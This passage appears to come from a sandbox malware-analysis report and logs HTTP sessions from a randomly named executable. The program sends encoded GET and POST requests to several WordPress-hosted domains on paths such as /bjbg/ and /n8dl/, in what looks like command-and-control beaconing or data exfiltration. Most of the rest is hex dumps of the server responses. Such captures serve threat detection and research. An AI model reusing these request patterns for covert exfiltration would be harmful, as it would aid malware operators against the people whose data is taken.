                                                            Jul 3, 2024 17:37:50.445550919 CEST2578OUTData Raw: 32 31 6a 46 56 71 68 49 63 64 4f 59 44 50 6f 45 63 31 43 6d 53 69 45 6f 73 79 71 64 42 72 46 57 72 68 6e 34 5a 64 71 55 65 57 50 67 65 4b 71 68 66 68 57 71 4c 4d 35 43 62 63 4f 58 41 75 49 46 59 52 6e 6f 43 42 56 37 37 39 6e 46 46 52 5a 76 32 30
                                                            Data Ascii: 21jFVqhIcdOYDPoEc1CmSiEosyqdBrFWrhn4ZdqUeWPgeKqhfhWqLM5CbcOXAuIFYRnoCBV779nFFRZv20Agxr/c6hQmFeJ7+oCWrChS1sJK0U98sPuskXTAeKdkqpbtfX5HCKd3HBh3hKHZZGKFmX69CBGn7g/lS+K63Y5rmsKoR7uiDBXMmMIPz/bThQxsBEwhLV0yvJ7RDwHtN+Y+hYDQSHC0f44It6SXq6/Xz+gOeDppoS9
                                                            Jul 3, 2024 17:37:50.445692062 CEST7734OUTData Raw: 52 61 75 30 52 78 48 35 69 76 78 76 61 70 73 2f 6c 4c 31 4f 4d 31 54 2f 68 67 63 4c 78 45 64 6d 4a 6c 30 4e 2f 4a 54 7a 38 4e 42 49 43 46 72 44 37 4c 72 65 4d 6c 59 31 56 32 53 46 50 6b 37 34 4a 71 4d 53 70 57 45 79 33 4e 6c 61 6f 79 62 4b 41 56
                                                            Data Ascii: Rau0RxH5ivxvaps/lL1OM1T/hgcLxEdmJl0N/JTz8NBICFrD7LreMlY1V2SFPk74JqMSpWEy3NlaoybKAVZxOzZVjZ26ahauElleNPL+HH6aMdA+4oQwKa75VeePxkRk2NQlsnt5uDuxwrCaMe7WIc4hSUqEvuaZEwzbQ/g79gtrFXWT5Vd8pusYL68LbCD/y1CjwksciUXWCqrj7oKMi45ekYZoo/c/XxDO8+jsmIZ3nyQzuv4
                                                            Jul 3, 2024 17:37:50.445894003 CEST12890OUTData Raw: 62 57 43 56 44 56 66 69 63 71 30 46 34 42 2f 4f 75 2b 67 45 79 38 38 47 54 46 47 35 6a 51 56 61 67 49 34 2b 41 2b 42 35 37 6f 61 75 69 52 36 47 55 63 52 38 57 30 70 76 4a 46 75 30 57 34 31 61 74 30 43 67 4a 38 75 75 79 77 4c 36 7a 2f 79 42 48 70
                                                            Data Ascii: bWCVDVficq0F4B/Ou+gEy88GTFG5jQVagI4+A+B57oauiR6GUcR8W0pvJFu0W41at0CgJ8uuywL6z/yBHpEwNzZlN7gTUqRN+0ouZn+kLSZb9Qsp61uj3J6C+P+6Ny2wlpTczeo6hiWwX6WXQ7SdpswVYbAUdNvUoxy3+Ub9yGIsPh4+AY3XUaDCm8HW86wDMIzt/YMsZgXF0lv/Bzyt1Ezh6NfwDZjSTiyo80gDBDVHAL2Fq2t
                                                            Jul 3, 2024 17:37:50.564210892 CEST2578OUTData Raw: 54 46 47 39 4b 38 6b 6c 36 33 61 46 66 31 39 46 79 57 76 4d 54 68 5a 31 46 53 34 48 62 34 52 51 2f 57 48 47 76 30 63 5a 59 6b 45 31 56 4d 2b 34 62 49 6a 69 58 39 6f 55 76 58 57 6b 4d 73 7a 75 57 62 4c 52 69 56 44 63 46 50 56 6e 4b 56 49 44 48 43
                                                            Data Ascii: TFG9K8kl63aFf19FyWvMThZ1FS4Hb4RQ/WHGv0cZYkE1VM+4bIjiX9oUvXWkMszuWbLRiVDcFPVnKVIDHC1SORrZ92/Kj72BGK02giSxqSuOLDk6k1S1OiH+AeQirEVEa1SsBSDCPrAGyNe4R0bW0h7keyyIe1Vk9pUI7pIoErjO0Kv8ktpk/8MIX6tATrkoTbmxWEZOYrGzACPkBgT1OY1F5Pmnl6xBfn//ou6XXH4aom6qJUK
                                                            Jul 3, 2024 17:37:50.564368010 CEST2578OUTData Raw: 74 35 38 5a 4b 6d 79 30 62 7a 73 45 78 62 7a 30 44 69 4e 30 4b 47 34 76 79 77 61 61 4e 45 67 55 36 61 42 4a 78 45 30 39 36 39 5a 2f 42 38 70 62 32 43 70 4b 47 4f 48 58 44 45 4b 6f 31 51 51 34 64 6f 6a 49 6d 70 67 6a 6c 4a 4f 79 55 69 57 39 70 59
                                                            Data Ascii: t58ZKmy0bzsExbz0DiN0KG4vywaaNEgU6aBJxE0969Z/B8pb2CpKGOHXDEKo1QQ4dojImpgjlJOyUiW9pYv0BTo8d4vafKotFSjf6q2VidwJC5I6UpBXsrL8eJXbexR5d7R+GmmsYrAPLeFLThf25ZGj1A1ZvKvtKPox4ETN+27J4GoRx5eaVuTEYEbDpZFdAYKpvkq1MeRLqgzQc+WyB2EkOTMHyn9ppw0MEFnngn751Od3w3w
                                                            Jul 3, 2024 17:37:50.564570904 CEST5156OUTData Raw: 68 75 74 38 57 74 4c 35 66 6b 4a 57 36 56 78 7a 63 30 37 33 53 47 75 42 59 4e 58 77 32 43 51 6e 70 39 6d 63 50 70 30 68 44 46 6e 52 71 34 6a 50 58 50 47 79 64 2f 55 57 77 57 51 4d 62 48 51 76 30 4e 4f 57 46 59 6d 33 43 72 61 41 66 55 64 72 6c 70
                                                            Data Ascii: hut8WtL5fkJW6Vxzc073SGuBYNXw2CQnp9mcPp0hDFnRq4jPXPGyd/UWwWQMbHQv0NOWFYm3CraAfUdrlpKhF/RgxBbyeKP3NGCnOUDchEcJ8a39dLWcKJJBmF8bn/Sqmzf9APSWDzaokktt1F8DmW93syJaUfM4JMQxjq8ei6Ub6MCijckmNGYUefxYakkgu0INmDxyZ5hKax+z/6f6t+ME7E1Hkc1v0IpC0+qw2mIr+Q9doLa
                                                            Jul 3, 2024 17:37:50.564742088 CEST4554OUTData Raw: 65 66 31 41 57 71 72 44 4d 4c 2f 35 32 64 6d 73 30 63 66 46 6a 65 6b 66 47 76 70 37 36 73 52 31 48 59 46 2b 6a 71 55 66 72 4e 48 57 34 75 5a 61 61 73 78 36 51 43 37 67 5a 77 68 34 62 53 4e 68 39 6d 31 6d 31 75 50 4e 75 42 77 75 46 73 69 76 65 2f
                                                            Data Ascii: ef1AWqrDML/52dms0cfFjekfGvp76sR1HYF+jqUfrNHW4uZaasx6QC7gZwh4bSNh9m1m1uPNuBwuFsive/CU39R9dyMkgfoOQAjsj/Bd9GB3TA1BY4T0fxYTSsQLcD0zzmlV7qXI44qJnRR5V5+gVBZ27n2kTV6RkVFbqqGrCySr2MBKmhtpDvN/BuNVQPXlzLjMfBWZSa1qilJLZ2Fik+ov6DsBfbNQtmKWOx1tHdcTR8rgV8z
                                                            Jul 3, 2024 17:37:51.024049044 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: _cfuvid=QM.78s0mfIAeC4YRoX5T.1X2oVj_9R4U_FraGL8j2lY-1720021070959-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f589eaa62d25-ORD
                                                            Content-Encoding: gzip
                                                            Data Raw: 32 61 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 6d 77 db 36 b2 f0 e7 e4 57 30 ca 69 6a 2d 29 59 92 5f 63 57 e9 c6 76 ec a4 b1 13 af e5 b4 4f 6f d3 d3 03 91 23 11 16 08 30 00 28 59 f1 f5 7f 7f ce 0c 48 8a b2 e5 b7 38 dd de ec d6 1c 80 c0 cc 60 30 18 cc 00 20 f4 d3 b3 bd 8f bb a7 bf 1f bf f1 62 9b 88 57 4f 7f c2 87 27 98 1c 76 6b 20 1b 9f 7a 35 cc 03 16 bd 7a e2 3d 7d f2 53 02 96 79 b1 b5 69 03 be 64 7c dc ad fd bf c6 a7 d7 8d 5d 95 a4 cc f2 be 80 9a 17 2a 69 41 da 6e ed dd 9b 2e 44 43 a8 bd 2a aa 49 96 40 b7 36 e6 30 49 95 b6 95 92 13 1e d9 b8 1b c1 98 87 d0 a0 44 e0 71 c9 2d 67 a2 61 42 26 a0 db 9e 61 09 63 a6 0d d8 6e ed d3 e9 7e 63 b3 f6 ea e9 1c fa 1f b5 ea 2b 6b 7e 2c 91 ff 28 15 97 11 9c 07 de 40 09 a1 26 3f 7a cb 54 e5 59 a3 e1 9d c6 dc 78 86 5b f0 b8 f1 54 6a 79 c2 bf 42 e4 4d b8 8d 3d 1b 83 f7 bb 62 c6 7a bd 37 1f bd 54 64 43 2e bd 71 67 a5 d9 f2 1a 24 00 b3 b5 bc 3c c5 02 cd 50 25 cb 13 a5 a3 54 83 31 cb ae a8 59 36 a0 96 bd 46 03 f9 b6 dc 0a 78 75 cc 86 e0 49 65 bd 81 ca 64 e4 35 bc [TRUNCATED]
                                                            Data Ascii: 2ae3}mw6W0ij-)Y_cWvOo#0(YH8`0 bWO'vk z5z=}Syid|]*iAn.DC*I@60IDq-gaB&acn~c+k~,(@&?zTYx[TjyBM=bz7TdC.qg$<P%T1Y6FxuIed5C6DI$$S1*r%ZvZ[S-P,Sm[T0UJ?BWp5Og)tk,M3BHP4VWJnqQ7m~~[<9}4%W:F2A-rL!O"TxV^m/}<5*m<


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.11.204979466.235.200.145807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:52.995919943 CEST528OUTGET /bjbg/?_B7=LxyxWrj8kri0gh&vX=PaEFrgJgmJNh1u/DWUxMIeDskG5qzMhDGrQ71u93fIH85Lzxsg5t1cmIlpAxPUwLJ58UUf9JzsDSaHkwZqJSKveW5uukdz+QiIy0PILQ7uEd2NrIiK6nDiA= HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:53.376271963 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: MISS
                                                            Set-Cookie: _cfuvid=GdR6J7M7UyeLSOen6FI8vvmIKiL9UZKbqu7AICoDdbc-1720021073312-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f59a9da42cf5-ORD
                                                            Data Raw: 37 63 66 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 09 20 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 30 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 [TRUNCATED]
                                                            Data Ascii: 7cf1<!DOCTYPE html><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta charset="UTF-8"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.0 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Lakemont Community Association</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Lakemont Community Association" /><meta property="og:site_name" content="Lakemo
                                                            Jul 3, 2024 17:37:53.376287937 CEST1289INData Raw: 6e 74 20 43 6f 6d 6d 75 6e 69 74 79 20 41 73 73 6f 63 69 61 74 69 6f 6e 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65
                                                            Data Ascii: nt Community Association" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://lakemontbellevue.net/#website","url":"https://lakemontbellevue.net/","name
                                                            Jul 3, 2024 17:37:53.376390934 CEST1289INData Raw: 68 65 69 67 68 74 22 3a 37 30 2c 22 63 61 70 74 69 6f 6e 22 3a 22 4c 61 6b 65 6d 6f 6e 74 20 43 6f 6d 6d 75 6e 69 74 79 20 41 73 73 6f 63 69 61 74 69 6f 6e 22 7d 2c 22 69 6d 61 67 65 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 61 6b
                                                            Data Ascii: height":70,"caption":"Lakemont Community Association"},"image":{"@id":"https://lakemontbellevue.net/#/schema/logo/image/"}}]}</script>... / Yoast SEO plugin. --><link rel='dns-prefetch' href='//lakemontbellevue.net' /><link rel='dns-pre
                                                            Jul 3, 2024 17:37:53.376418114 CEST1289INData Raw: 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6c 61 6b 65 6d 6f
                                                            Data Ascii: re\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/lakemontbellevue.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={suppo
                                                            Jul 3, 2024 17:37:53.376431942 CEST1289INData Raw: 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c
                                                            Data Ascii: pe?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("scri
                                                            Jul 3, 2024 17:37:53.376444101 CEST1289INData Raw: 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e
                                                            Data Ascii: .supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=fu
                                                            Jul 3, 2024 17:37:53.376463890 CEST1289INData Raw: 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 6c 61 6b 65 6d 6f 6e 74 62 65 6c 6c 65 76 75 65 2e 6e 65 74 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6d 65 64 69 61 65 6c 65 6d 65 6e 74 2f 77 70 2d 6d 65 64 69 61 65 6c 65 6d 65 6e 74 2e 6d 69
                                                            Data Ascii: ' href='http://lakemontbellevue.net/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.5.5' type='text/css' media='all' /><style id='jetpack-sharing-buttons-style-inline-css' type='text/css'>.jetpack-sharing-buttons__services-list{dis
                                                            Jul 3, 2024 17:37:53.376476049 CEST1289INData Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32
                                                            Data Ascii: ;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css
                                                            Jul 3, 2024 17:37:53.376487970 CEST1289INData Raw: 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20
                                                            Data Ascii: rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(15
                                                            Jul 3, 2024 17:37:53.376499891 CEST1289INData Raw: 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 36 30 3a 20 32 2e 32 35 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 37 30 3a 20 33 2e 33 38
                                                            Data Ascii: ing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4
                                                            Jul 3, 2024 17:37:53.377091885 CEST1289INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f
                                                            Data Ascii: ar(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.11.2049795103.120.176.124807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:58.967653990 CEST791OUTPOST /n8dl/ HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.vintagewins.com
                                                            Referer: http://www.vintagewins.com/n8dl/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 49 41 65 63 39 4b 32 6f 6e 48 73 68 62 74 64 56 31 6d 2b 76 37 72 77 39 55 4b 79 54 44 2b 55 56 35 65 4b 64 79 72 74 59 4f 63 39 51 67 6e 66 46 74 51 5a 42 69 65 44 45 79 63 4f 53 4a 63 59 70 6b 77 70 4b 77 4d 42 39 42 2f 46 41 53 4c 62 6c 6d 38 72 69 72 38 73 78 75 2f 2f 34 41 70 50 6f 35 6c 71 6f 43 74 61 2b 64 44 37 4d 6b 6d 33 39 71 4f 4a 75 77 42 47 4f 64 4d 7a 72 33 4d 50 69 50 4f 49 37 47 56 50 38 7a 45 45 49 57 54 4b 61 49 6a 46 4b 33 75 6d 65 50 46 57 59 64 6e 65 5a 64 74 64 2b 42 69 66 57 49 6c 33 76 74 6f 41 54 6b 67 47 35 64 34 38 4d 6f 54 47 37 6f 4b 67 32 4f 41 3d 3d
                                                            Data Ascii: vX=IAec9K2onHshbtdV1m+v7rw9UKyTD+UV5eKdyrtYOc9QgnfFtQZBieDEycOSJcYpkwpKwMB9B/FASLblm8rir8sxu//4ApPo5lqoCta+dD7Mkm39qOJuwBGOdMzr3MPiPOI7GVP8zEEIWTKaIjFK3umePFWYdneZdtd+BifWIl3vtoATkgG5d48MoTG7oKg2OA==
                                                            Jul 3, 2024 17:37:59.900204897 CEST1289INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            content-encoding: br
                                                            vary: Accept-Encoding
                                                            date: Wed, 03 Jul 2024 15:37:59 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 64 37 63 0d 0a d0 66 23 a2 a2 f5 43 22 8a f9 00 68 a4 2c 9c bf 3f 42 86 b9 ff 96 a9 7f 8e 2f 27 4c 67 64 48 10 92 ed ac 72 49 db bf 2c 5b 94 e9 60 f4 24 93 20 d0 87 e7 6d 54 6d 36 c3 fe f9 bc 94 be e4 64 46 92 0b c6 29 af 6f 86 e2 65 3d a1 f8 0c 6c 49 f9 bf fd be 9d 8e 58 0c 54 d3 90 48 9c 4e 93 34 f3 66 d6 1f e2 be 62 f3 e6 8e ac a8 fc 5d cc 56 4c 20 89 67 22 f9 2f 62 92 a8 94 b0 11 5a 63 1b 5b a7 9f 25 2c 18 b5 7d 81 aa 53 91 91 63 b0 23 d7 a0 92 e3 ba a2 58 81 56 44 09 70 ff 38 7b bb c3 de f5 5e d5 bd a2 e0 f3 3f 7f 07 b4 f5 21 7f 49 bf 78 b0 b6 bb e8 df ec 74 4c 80 8a fe 0f 3c 75 3b cc eb 1e 14 4d 38 01 28 6b e4 1f d5 03 29 36 22 08 f2 a7 ef de f2 64 b4 03 b5 c4 f4 e2 9c f5 af 24 82 53 74 88 a1 b5 0e de b8 7d ce 5d 3f 74 32 c4 ae 38 b5 be 58 c2 9d 9e f5 dd 56 9b d7 8d 3d 07 eb 51 77 70 b4 3e cd f1 7f 2d a7 de c5 c1 c8 61 37 e0 78 1a b4 e8 e0 f1 17 dd 01 f1 01 49 37 5b 8b cc de dc af 96 cb 0d 81 67 da 4e b3 7e 52 e5 6f 11 c3 36 60 5a 84 b6 a1 45 af 4f b9 ed 75 07 f9 ff c0 27 84 63 35 03 8d 36 0b [TRUNCATED]
                                                            Data Ascii: d7cf#C"h,?B/'LgdHrI,[`$ mTm6dF)oe=lIXTHN4fb]VL g"/bZc[%,}Sc#XVDp8{^?!IxtL<u;M8(k)6"d$St}]?t28XV=Qwp>-a7xI7[gN~Ro6`ZEOu'c56R<Y4>s|nrIv!t`C@6"I6ICsWM|djR/CI~D?rqGg%)2b6W8@^h}"#FG+&H(Cx"XYu]NwiEgm7CaD:Fj7Y1h y.C^m4t[/_Du+o7a_kc)p,f!u|<HH6naGg5&SB3jc=?O)u2~ dh}g3Ca8M,u` Px>l("~i?$+:yQ\lsR|_#z\>dm;BFFET/eH`jXC@)yBthvht:Nx~m}zBUY6~uz}{|YQ'lZ:5uXOI,;?m^f{]u5u7u
                                                            Jul 3, 2024 17:37:59.900304079 CEST1289INData Raw: 31 df 84 12 70 ed b8 6b 29 df 44 83 51 38 e0 13 1b 5a 3f 4d bd 6f cc ea b6 8e 81 ec b6 cb 2d 75 1e b4 5d c4 27 2c 01 96 31 3f b8 2d fe a0 23 89 8a ee 7d 33 f6 bf 73 68 e8 5c e1 79 80 d0 92 bf 43 7c 85 f8 b5 0b 5b ed 7e 37 61 80 2c 4b e0 5a 62 7d
                                                            Data Ascii: 1pk)DQ8Z?Mo-u]',1?-#}3sh\yC|[~7a,KZb}B"y8vi38[X")ZE{#UCx*{iptg=(aB6xT,z5hbhm_j>'xVEJd Q%L((h!y)ntd
                                                            Jul 3, 2024 17:37:59.900326967 CEST1256INData Raw: f0 de c7 91 af 03 7e 0b c4 4c 26 d7 ea a8 9f 63 3e 4b 9e 63 80 f7 6d 6f 39 c6 78 89 a7 d2 8d 29 ae c7 98 94 3a 36 24 ee e6 b4 c6 ae 40 fd 81 5d 58 db 31 4e 58 a6 be bb 38 64 d3 a0 48 83 5c 01 7d c4 32 f5 17 b6 16 3d a3 88 a9 80 89 3e 56 e4 b9 52
                                                            Data Ascii: ~L&c>Kcmo9x):6$@]X1NX8dH\}2=>VRfNQEP=P#kZC"E +t-(|u2AB!9%qh{,8MIG:<JZdo[6cS,jq8-1(H?[FBA3}hLqs
                                                            Jul 3, 2024 17:37:59.908879042 CEST1289INData Raw: 38 34 65 0d 0a 40 01 01 40 4e 53 ad b7 b6 3c fe b3 0c 1c 58 e7 50 cd a5 ad bc a5 55 63 41 4b 23 71 72 14 49 14 5b 4e bb ff b5 d4 b3 30 75 92 f6 ee e5 54 8d ae 51 f3 41 04 69 73 29 72 88 66 fe fe e3 10 82 43 59 d9 a8 56 69 66 e7 b7 c2 45 48 19 59
                                                            Data Ascii: 84e@@NS<XPUcAK#qrI[N0uTQAis)rfCYVifEHYeJx1'nX)92ibqmXMSAo_f=H+Z~0~gxgTIj,1>h7x0|jgs<|a\.{Mdw
                                                            Jul 3, 2024 17:37:59.908893108 CEST844INData Raw: 81 44 e4 93 74 0c 56 25 38 95 2e c9 20 92 09 4b c1 67 68 25 ce 45 9c fa 43 db fb f5 3d f1 47 f9 10 2b 35 1e eb a5 9a a7 fe 64 d5 4d b3 94 78 ad 58 d3 ab 4d 51 69 a7 a7 65 16 db 64 31 5c 01 b1 57 41 db 35 d0 b1 a4 f5 4d f4 43 e8 e8 ce 41 38 e8 fa
                                                            Data Ascii: DtV%8. Kgh%EC=G+5dMxXMQied1\WA5MCA8M=nG]Xz?z0F)V4cp0/Fr]tj_*qi*p1!K??[e,A!<FPL=vk/?0*&`q7l-\D
                                                            Jul 3, 2024 17:37:59.950911999 CEST1123INData Raw: 34 35 63 0d 0a 40 02 01 40 ae a9 3a cb cb c4 91 f9 8d 6c a1 a4 93 52 da 98 c3 e6 2d 71 01 9e 43 e0 76 35 d6 4a 24 35 a6 13 ed 90 48 ab 7b 82 4a 12 8f a2 c9 ce de ad a1 9e b4 69 13 6d f9 23 35 de e3 f1 43 e4 43 7b 42 69 7c 8c fc df b3 25 49 bd 38
                                                            Data Ascii: 45c@@:lR-qCv5J$5H{Jim#5CC{Bi|%I8~pJ"'bz=a7 J`FwYv]!Hpt].-1*,nI$4@ao\uvN^D?+U{2\:LK.vSH|
